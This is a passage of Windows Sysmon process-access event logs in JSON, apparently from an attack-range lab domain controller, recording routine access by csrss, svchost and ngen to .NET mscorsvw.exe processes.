C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.023","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7021,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010A59C0B00}\r\nTargetProcessId: 2920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010A59C0B00}","TargetProcessId":"2920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7022,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-001016A00B00}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-001016A00B00}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7023,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-001016A00B00}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-001016A00B00}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7024,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-001016A00B00}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-001016A00B00}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7025,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.257\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.257","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7026,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.257\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.257","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7027,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.257\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-0010F4A30B00}\r\nTargetProcessId: 1432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:07.257","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2233-5F25-0000-0010F4A30B00}","TargetProcessId":"1432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7028,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:07.335\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2233-5F25-0000-00108DA70B00}\r\nTargetProcessId: 748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 